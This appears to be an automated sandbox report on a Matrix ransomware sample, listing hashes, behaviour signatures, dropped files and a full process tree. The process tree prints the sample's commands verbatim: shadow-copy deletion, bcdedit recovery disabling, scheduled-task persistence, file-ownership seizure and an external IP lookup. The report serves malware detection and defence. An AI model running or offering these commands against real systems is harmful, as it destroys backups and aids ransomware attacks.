Analysis

  • max time kernel
    150s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    08-10-2020 15:06

General

  • Target

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 498 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 11 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 7625 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 108 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe"
      2⤵
        PID:1920
      • C:\Users\Admin\AppData\Local\Temp\NWodi944.exe
        "C:\Users\Admin\AppData\Local\Temp\NWodi944.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1968
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ST2Yn9mk.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:108
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blacklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1164
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BJ2ttsem.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          • Modifies Control Panel
          PID:828
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
          • Modifies Control Panel
          PID:524
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
          3⤵
          • Matrix Ransomware
          • Modifies Control Panel
          PID:752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\SysWOW64\wscript.exe
          wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1388
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat" /sc minute /mo 5 /RL HIGHEST /F
              5⤵
              • Creates scheduled task(s)
              PID:1324
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1836
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /I /tn DSHCA
              5⤵
                PID:1576
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\HRiS85Na.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\SysWOW64\attrib.exe
            attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
            3⤵
            • Views/modifies file attributes
            PID:1400
          • C:\Windows\SysWOW64\cacls.exe
            cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
            3⤵
              PID:1904
            • C:\Windows\SysWOW64\takeown.exe
              takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
              3⤵
              • Modifies file permissions
              PID:1480
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
              3⤵
              • Loads dropped DLL
              PID:1000
              • C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe
                GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1284
                • C:\Users\Admin\AppData\Local\Temp\GBVottoK64.exe
                  GBVottoK.exe -accepteula "StandardBusiness.pdf" -nobanner
                  5⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Modifies service
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: LoadsDriver
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1216
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {4CA8C3E2-9FB4-4250-86BD-FB786BBAC5A4} S-1-5-21-403932158-3302036622-1224131197-1000:ELJKIHEZ\Admin:Interactive:[1]
          1⤵
            PID:1404
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\zenQP1CY.bat"
              2⤵
                PID:568
                • C:\Windows\system32\vssadmin.exe
                  vssadmin Delete Shadows /All /Quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:1440
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic SHADOWCOPY DELETE
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1544
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                  3⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1224
                  • C:\Windows\system32\vssadmin.exe
                    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:792
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled No
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1544
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:556
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN DSHCA /F
                  3⤵
                    PID:1336
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Modifies service
                • Suspicious use of AdjustPrivilegeToken
                PID:1688

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48

                MD5

                02ff38ac870de39782aeee04d7b48231

                SHA1

                0390d39fa216c9b0ecdb38238304e518fb2b5095

                SHA256

                fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                SHA512

                24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481

                MD5

                df44874327d79bd75e4264cb8dc01811

                SHA1

                1396b06debed65ea93c24998d244edebd3c0209d

                SHA256

                55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                SHA512

                95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566

                MD5

                b6d38f250ccc9003dd70efd3b778117f

                SHA1

                d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

                SHA256

                4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

                SHA512

                67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5

                MD5

                be4d72095faf84233ac17b94744f7084

                SHA1

                cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                SHA256

                b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                SHA512

                43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84

                MD5

                5e3c7184a75d42dda1a83606a45001d8

                SHA1

                94ca15637721d88f30eb4b6220b805c5be0360ed

                SHA256

                8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                SHA512

                fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_911495e8-cf87-4437-96d1-481e0f036ed1

                MD5

                02ff38ac870de39782aeee04d7b48231

                SHA1

                0390d39fa216c9b0ecdb38238304e518fb2b5095

                SHA256

                fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                SHA512

                24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a

                MD5

                75a8da7754349b38d64c87c938545b1b

                SHA1

                5c28c257d51f1c1587e29164cc03ea880c21b417

                SHA256

                bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                SHA512

                798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

                MD5

                e531ac4f51dfadb824ac091f93c6b7ba

                SHA1

                5498ed56ec830e7f8f628fca3eadba39083a2d2d

                SHA256

                eb874efbbe6f8cce018ee1fd0ab7f5f0a9be6384e10907fbd911b722288a0120

                SHA512

                ef0285f303114ac9e1437d2dad1664b7fe994fee609b5e97b46f209948b96401ee3d66e56a6237de4bd4342eb5bd8172eeb269718e8e5b4c1a9034b2ceafc294

              • C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

              • C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

              • C:\Users\Admin\AppData\Local\Temp\GBVottoK64.exe

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

              • C:\Users\Admin\AppData\Local\Temp\HRiS85Na.bat

                MD5

                c020768d57e25c5d6fda2e42938ea279

                SHA1

                89679d95e27e5b585c59b0af70168129e2032ce2

                SHA256

                628aa3a2944d5eb246a26c2d4d154bcc5c7fe19ec0715c547cd58cce4e2755fe

                SHA512

                263320e1a847163fa1415af6519dc7a51279444d2946ef425f2ac2b307d633e783262547f3f39bc40b7fffe5705b5759e4d80186177bac38f6dc4891afe354b5

              • C:\Users\Admin\AppData\Local\Temp\NWodi944.exe

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • C:\Users\Admin\AppData\Local\Temp\NWodi944.exe

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • C:\Users\Admin\AppData\Local\Temp\ST2Yn9mk.txt

                MD5

                75564e2df4b8c8d33695e8e5e58cb03c

                SHA1

                64a796a9f01a1f12bcbe641ecc92541a41ece9b5

                SHA256

                bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965

                SHA512

                c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af

              • C:\Users\Admin\AppData\Roaming\GivrCxyY.vbs

                MD5

                5aeffe09af9b00a1628a25aba6a51e97

                SHA1

                f927297fa377454ea4a5fe08b99daa34830389aa

                SHA256

                d618430a1325d40fe807d5d9ee1cd674b75a218f8fe08100f7850991ee673e40

                SHA512

                f491a8108cd9c5f0541e92144a52b3c1a08b185fbb4f2ae7ce7ffc475c5a5d8cacaf4c066a169bcf8db91eb1f62599f8e5003c5587c26b93332da6fa85a118f1

              • C:\Users\Admin\AppData\Roaming\zenQP1CY.bat

                MD5

                727702a1a16e38bdcb6b11f5ad6accf0

                SHA1

                3bd24ec2e69c64df56fa9188b8464d357b72479a

                SHA256

                9a9f6ba731baf78098f7a8122eeac82bab1467efab197bd665e0968da7d5e5d6

                SHA512

                5957dcdbce9f6b1282a54786e425420aae01d54b21e14ed0bf19fc860b1a11d6a7b3bd653022c0e054324f5b48a70377828955952582338f589420bdfc14d75f

              • \Users\Admin\AppData\Local\Temp\GBVottoK.exe

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

              • \Users\Admin\AppData\Local\Temp\GBVottoK64.exe

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

              • \Users\Admin\AppData\Local\Temp\NWodi944.exe

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • \Users\Admin\AppData\Local\Temp\NWodi944.exe

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • memory/108-6-0x0000000000000000-mapping.dmp

              • memory/524-35-0x0000000000000000-mapping.dmp

              • memory/556-103-0x0000000000000000-mapping.dmp

              • memory/568-49-0x0000000000000000-mapping.dmp

              • memory/752-36-0x0000000000000000-mapping.dmp

              • memory/788-44-0x0000000002830000-0x0000000002834000-memory.dmp

                Filesize

                16KB

              • memory/788-34-0x0000000000000000-mapping.dmp

              • memory/792-101-0x0000000000000000-mapping.dmp

              • memory/828-33-0x0000000000000000-mapping.dmp

              • memory/1000-48-0x0000000000000000-mapping.dmp

              • memory/1164-29-0x0000000006310000-0x0000000006311000-memory.dmp

                Filesize

                4KB

              • memory/1164-7-0x0000000000000000-mapping.dmp

              • memory/1164-8-0x0000000074580000-0x0000000074C6E000-memory.dmp

                Filesize

                6.9MB

              • memory/1164-9-0x0000000002340000-0x0000000002341000-memory.dmp

                Filesize

                4KB

              • memory/1164-10-0x0000000004760000-0x0000000004761000-memory.dmp

                Filesize

                4KB

              • memory/1164-11-0x0000000002510000-0x0000000002511000-memory.dmp

                Filesize

                4KB

              • memory/1164-12-0x0000000005260000-0x0000000005261000-memory.dmp

                Filesize

                4KB

              • memory/1164-15-0x00000000056A0000-0x00000000056A1000-memory.dmp

                Filesize

                4KB

              • memory/1164-20-0x00000000056E0000-0x00000000056E1000-memory.dmp

                Filesize

                4KB

              • memory/1164-21-0x0000000006130000-0x0000000006131000-memory.dmp

                Filesize

                4KB

              • memory/1164-28-0x0000000006230000-0x0000000006231000-memory.dmp

                Filesize

                4KB

              • memory/1216-55-0x0000000000000000-mapping.dmp

              • memory/1224-64-0x0000000002440000-0x0000000002441000-memory.dmp

                Filesize

                4KB

              • memory/1224-76-0x000000001AAD0000-0x000000001AAD1000-memory.dmp

                Filesize

                4KB

              • memory/1224-99-0x000000001B5F0000-0x000000001B5F1000-memory.dmp

                Filesize

                4KB

              • memory/1224-92-0x000000001B6B0000-0x000000001B6B1000-memory.dmp

                Filesize

                4KB

              • memory/1224-85-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

                Filesize

                4KB

              • memory/1224-60-0x0000000000000000-mapping.dmp

              • memory/1224-61-0x000007FEF6000000-0x000007FEF69EC000-memory.dmp

                Filesize

                9.9MB

              • memory/1224-62-0x0000000002400000-0x0000000002401000-memory.dmp

                Filesize

                4KB

              • memory/1224-63-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

                Filesize

                4KB

              • memory/1224-78-0x000000001AB00000-0x000000001AB01000-memory.dmp

                Filesize

                4KB

              • memory/1224-65-0x0000000002360000-0x0000000002361000-memory.dmp

                Filesize

                4KB

              • memory/1224-77-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

                Filesize

                4KB

              • memory/1224-69-0x000000001A830000-0x000000001A831000-memory.dmp

                Filesize

                4KB

              • memory/1224-74-0x000000001A870000-0x000000001A871000-memory.dmp

                Filesize

                4KB

              • memory/1224-75-0x000000001AAC0000-0x000000001AAC1000-memory.dmp

                Filesize

                4KB

              • memory/1284-52-0x0000000000000000-mapping.dmp

              • memory/1324-39-0x0000000000000000-mapping.dmp

              • memory/1336-104-0x0000000000000000-mapping.dmp

              • memory/1388-38-0x0000000000000000-mapping.dmp

              • memory/1400-42-0x0000000000000000-mapping.dmp

              • memory/1440-58-0x0000000000000000-mapping.dmp

              • memory/1480-47-0x0000000000000000-mapping.dmp

              • memory/1516-40-0x0000000000000000-mapping.dmp

              • memory/1544-59-0x0000000000000000-mapping.dmp

              • memory/1544-102-0x0000000000000000-mapping.dmp

              • memory/1576-45-0x0000000000000000-mapping.dmp

              • memory/1584-31-0x0000000000000000-mapping.dmp

              • memory/1616-32-0x0000000000000000-mapping.dmp

              • memory/1836-43-0x0000000000000000-mapping.dmp

              • memory/1904-46-0x0000000000000000-mapping.dmp

              • memory/1920-0-0x0000000000000000-mapping.dmp

              • memory/1968-4-0x0000000000000000-mapping.dmp